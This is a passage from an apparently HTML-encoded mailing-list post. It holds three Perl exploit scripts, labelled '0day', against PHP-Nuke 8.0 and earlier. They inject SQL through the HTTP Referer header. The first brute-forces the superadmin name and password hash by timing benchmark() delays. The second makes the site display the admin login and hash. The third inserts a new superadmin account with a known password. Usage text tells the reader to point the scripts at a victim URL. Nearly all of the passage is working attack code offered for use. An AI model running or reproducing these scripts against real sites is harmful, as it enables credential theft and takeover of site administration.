bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp; }<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp; print &quot;\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return $wynik;<br>}<br>sub=
 brute_force_aid{<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my ($dlugos=
c)=3D@_;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my ($i,$j,$referer,$=
wynik,$dolny_zakres);
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; for($i=3D1;$i&lt;=3D$dlugosc=
;$i++){<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp; for($j=3D48;$j&lt;=3D122;$j++){<br>&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p; $referer=3D&quot;<a href=3D"http://www.krasza.int.pl&#39;),(-1,(SELECT">=
http://www.krasza.int.pl&#39;),(-1,(SELECT</a>
 IF((ASCII(SUBSTRING(`aid`,&quot;.$i.&quot;,1))=3D&quot;.$j.&quot;) &amp; 1=
, benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` WHERE `radminsuper`=3D=
1))/*&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $czy_dziala=3Dczy_dziala($referer);<br>&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if($czy_dziala=
=3D=3D1){
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp; $znak=3Dchr($j);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;$znak&quot;;<br>&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp; $wynik.=3D$znak;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if($i&lt;$d=
lugosc){
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp; $i+=3D1;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $j=3D47;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp; }else{<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp; last;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
 }
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if($j=3D=3D57=
){<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $j=3D64;<br>&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if($j=3D=3D90){<br>&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp; $j=3D96;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp; }<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp; print &quot;\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return $wynik;<br>}<br>sub ust=
al_dlugosc{<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my ($pole,$len)=
=3D@_;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my ($referer,$narazie_=
dziala_liczba,$nie_dziala_liczba);
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $narazie_dziala_liczba=3D0;<=
br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $nie_dziala_liczba=3D65;<br>&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #for($len=3D1;$len&lt;64;$len++){=
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; while($len&lt;=3D64){<br>&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp; if($narazie_dziala_liczba=3D=3D$len || $nie_dziala_liczba&lt;=
=3D$len){
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return =
$narazie_dziala_liczba;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<br>&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $referer=3D=
&quot;<a href=3D"http://www.krasza.int.pl&#39;),(-1,(SELECT">http://www.kra=
sza.int.pl&#39;),(-1,(SELECT</a> IF((LENGTH(`&quot;.$pole.&quot;`)&gt;&quot=
;.$len.&quot;) &amp; 1, benchmark(50000000,CHAR(0)),0) FROM `nuke_authors` =
WHERE `radminsuper`=3D1))/*&quot;;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp; $czy_dziala=3Dczy_dziala($referer);<br>&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
if($czy_dziala=3D=3D1){<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp; $narazie_dziala_liczba=3D$len+1;<br>&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $len+=3D2;<br>&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }els=
e{<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $nie_=
dziala_liczba=3D$len+1;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $len-=
=3D1;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp;&nbsp; }<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<=
br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;[-]Exploit Failed=
\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; exit;<br>}<br>sub c=
zy_dziala{<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my ($refik)=3D@_;<=
br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my $czas_zapytania;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $czas_zapytania=3Dpolacz($refik)=
;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; if($czas_zapytania&gt;$czas=
_nor+$offset){<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return 1;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp; }else{<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return 0;<br>&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp; }<br>}<br>sub polacz{<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp; my ($referrer)=3D@_;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; my ($czas,$czas_poczatek,$cz=
as_koniec);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $zadanie-&gt;refe=
rer($referrer);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $czas_poczate=
k=3Dtime();<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $respone=3D$ua-&g=
t;request($zadanie);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $respone=
-&gt;is_success or die &quot;$adres : &quot;,$respone-&gt;message,&quot;\n&=
quot;;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $czas_koniec=3Dtime();<br>&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $czas=3D$czas_koniec-$czas_poczate=
k;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; return $czas;<br>}<br>sub =
banner{<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;0day expl=
oit for PHP-nuke &lt;=3D8.0 Final\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp; print &quot;Blind sql injection attack in INSERT syntax\n&quo=
t;;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;version mysql &g=
t;=3D 4.0.24, using &#39;brute force&#39;\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp; print &quot;Coded by:Maciej `krasza` Kukla[<a href=3D=
"mailto:krasza\@gmail.com">krasza\@gmail.com</a>]\n\n&quot;;<br>}<br>sub he=
lp{
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;0day exploit for=
 PHP-nuke &lt;=3D8.0 Final\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp; print &quot;Blind sql injection attack in INSERT syntax\n&quot;;<br>=
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;version mysql &gt;=
=3D 4.0.24, using &#39;brute force&#39;\n&quot;;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;Coded by:Maciej =
`krasza` Kukla[<a href=3D"mailto:krasza\@gmail.com">krasza\@gmail.com</a>]\=
n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;Use:\n&q=
uot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;\tperl expl=
oit.pl [url]\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &=
quot;\t[url]-vicitim webpage with=20
index.php\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quo=
t;Example:\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &qu=
ot;\tperl bruteforce.pl <a href=3D"http://phpnuke.org/index.php\n">http://p=
hpnuke.org/index.php\n</a>&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n=
bsp; exit(0);<br>}<br>---<br>
<br>Exploit for mysql &gt;=3D 4.0.24, when block &#39;HTTP Referers&#39; is=
 on:<br><br>---<br>#!/usr/bin/perl<br>#0day exploit for PHP-nuke &lt;=3D8.0=
 Final<br>#Sql injection attack in INSERT syntax<br>#version, when &#39;HTT=
P Referers&#39; block is on
<br>#Coded by:Maciej `krasza` Kukla[<a href=3D"mailto:krasza@gmail.com">kra=
sza@gmail.com</a>]<br>#Screenshot:<br>#0day exploit for PHP-nuke &lt;=3D8.0=
 Final<br>#Sql injection attack in INSERT syntax<br>#version, when &#39;HTT=
P Referers&#39; block is on
<br>#Coded by:Maciej `krasza` Kukla[<a href=3D"mailto:krasza@gmail.com">kra=
sza@gmail.com</a>]<br>#<br>#[+]You can see login and hash on web page in &#=
39;HTTP referers&#39; block<br>#[+]Exploit successed<br>use strict;<br>use =
warnings;
<br>use LWP;<br>my $adres=3Dshift or help();<br>my $ua =3D LWP::UserAgent-&=
gt;new;<br>my $zadanie =3D HTTP::Request-&gt;new(GET =3D&gt; $adres);<br>my=
 ($respone,$referer);<br>banner();<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp; $referer=3D&quot;<a href=3D"http://www.krasza.int.pl&#39;),(NULL,(SEL=
ECT">
http://www.krasza.int.pl&#39;),(NULL,(SELECT</a> `pwd` FROM `nuke_authors` =
WHERE `radminsuper`=3D1))/*&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp; $zadanie-&gt;referer($referer);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp; $respone=3D$ua-&gt;request($zadanie);<br>&nbsp;&nbsp;&nbsp;&nbsp;&=
nbsp;&nbsp;&nbsp; $respone-&gt;is_success or die &quot;$adres : &quot;,$res=
pone-&gt;message,&quot;\n&quot;;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $referer=3D&quot;<a href=3D"=
http://www.krasza.int.pl&#39;),(NULL,(SELECT">http://www.krasza.int.pl&#39;=
),(NULL,(SELECT</a> `aid` FROM `nuke_authors` WHERE `radminsuper`=3D1))/*&q=
uot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $zadanie-&gt;referer($r=
eferer);
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $respone=3D$ua-&gt;request($=
zadanie);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $respone-&gt;is_suc=
cess or die &quot;$adres : &quot;,$respone-&gt;message,&quot;\n&quot;;<br>&=
nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;[+]You can see login =
and hash on web page in &#39;HTTP referers&#39; block\n&quot;;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;[+]Exploit succe=
ssed\n&quot;;<br>sub banner{<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
print &quot;0day exploit for PHP-nuke &lt;=3D8.0 Final\n&quot;;<br>&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;Sql injection attack in INSE=
RT syntax\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quo=
t;version, when &#39;HTTP Referers&#39; block is on\n&quot;;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;Coded by:Maciej =
`krasza` Kukla[<a href=3D"mailto:krasza\@gmail.com">krasza\@gmail.com</a>]\=
n\n&quot;;<br>}<br>sub help{<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
print &quot;0day exploit for PHP-nuke &lt;=3D8.0 Final\n&quot;;<br>&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;Sql injection attack in INSE=
RT syntax\n&quot;;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;version, when &#=
39;HTTP Referers&#39; block is on\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp; print &quot;Coded by:Maciej `krasza` Kukla[<a href=3D"mailto:=
krasza\@gmail.com">krasza\@gmail.com</a>]\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp; print &quot;Use:\n&quot;;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;\tperl exploit.p=
l [url]\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;=
\t[url]-vicitim webpage with index.php\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp; print &quot;Example:\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp; print &quot;\tperl exploit.pl <a href=3D"http://phpnuke=
.org/index.php\n">
http://phpnuke.org/index.php\n</a>&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp; exit(0);<br>}<br>---<br><br>Exploit for PostgreSQL,mssql:<br><=
br>---<br>#!/usr/bin/perl<br>#0day exploit for PHP-nuke &lt;=3D8.0 Final<br=
>#Sql injection attack in INSERT syntax
<br>#version for every base(PostgreSQL,mssql...) except MySQL base<br>#Code=
d by:Maciej `krasza` Kukla[<a href=3D"mailto:krasza@gmail.com">krasza@gmail=
.com</a>]<br>#Screenshot:<br>#0day exploit for PHP-nuke &lt;=3D8.0 Final<br=
>
#Sql injection attack in INSERT syntax<br>#version for every base(PostgreSQ=
L,mssql...) except MySQL base<br>#Coded by:Maciej `krasza` Kukla[<a href=3D=
"mailto:krasza@gmail.com">krasza@gmail.com</a>]<br>#<br>#[+]I registered ne=
w superadmin
<br>#[+]You can login at <a href=3D"http://blackshell.pl/~krasza/nuke/html/=
index.php">http://blackshell.pl/~krasza/nuke/html/index.php</a><br>#[+]Logi=
n:krasza<br>#[+]Password:krasza<br>#[+]Exploit successed<br>use strict;<br>
use warnings;<br>use LWP;<br>my $adres=3Dshift or help();<br>my $ua =3D LWP=
::UserAgent-&gt;new;<br>my $zadanie =3D HTTP::Request-&gt;new(GET =3D&gt; $=
adres);<br>my ($respone,$referer);<br>banner();<br>&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp; $referer=3D&quot;<a href=3D"http://www.krasza.int.pl&#39=
;);INSERT">
http://www.krasza.int.pl&#39;);INSERT</a> INTO `nuke_authors` VALUES (&#39;=
krasza&#39;, &#39;God&#39;, &#39;<a href=3D"http://www.krasza.int.pl">http:=
//www.krasza.int.pl</a>&#39;, &#39;<a href=3D"mailto:krasza\@gmail.com">kra=
sza\@gmail.com
</a>&#39;, &#39;61af1f6e572d7fe3a72f54a6ac53830e&#39;, &#39;0&#39;, &#39;1&=
#39;, &#39;&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $zadanie-&=
gt;referer($referer);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; $respon=
e=3D$ua-&gt;request($zadanie);<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp=
; $respone-&gt;is_success or die &quot;$adres : &quot;,$respone-&gt;message=
,&quot;\n&quot;;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;[+]I registered =
new superadmin\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print=
 &quot;[+]You can login at $adres \n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbs=
p;&nbsp;&nbsp; print &quot;[+]Login:krasza\n&quot;;<br>&nbsp;&nbsp;&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp; print &quot;[+]Password:krasza\n&quot;;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;[+]Exploit succe=
ssed\n&quot;;<br>sub banner{<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
print &quot;0day exploit for PHP-nuke &lt;=3D8.0 Final\n&quot;;<br>&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;Sql injection attack in INSE=
RT syntax\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quo=
t;version for every base(PostgreSQL,mssql...) except MySQL base\n&quot;;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;Coded by:Maciej =
`krasza` Kukla[<a href=3D"mailto:krasza\@gmail.com">krasza\@gmail.com</a>]\=
n\n&quot;;<br>}<br>sub help{<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; =
print &quot;0day exploit for PHP-nuke &lt;=3D8.0 Final\n&quot;;<br>&nbsp;&n=
bsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;Sql injection attack in INSE=
RT syntax\n&quot;;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;version for ever=
y base(PostgreSQL,mssql...) except MySQL base\n&quot;;<br>&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;Coded by:Maciej `krasza` Kukla[<a hre=
f=3D"mailto:krasza\@gmail.com">krasza\@gmail.com</a>]\n&quot;;<br>&nbsp;&nb=
sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;Use:\n&quot;;
<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;\tperl exploit.p=
l [url]\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &quot;=
\t[url]-vicitim webpage with index.php\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;=
&nbsp;&nbsp;&nbsp; print &quot;Example:\n&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp=
;&nbsp;&nbsp;&nbsp; print &quot;\tperl exploit.pl <a href=3D"http://phpnuke=
.org/index.php\n">
http://phpnuke.org/index.php\n</a>&quot;;<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;=
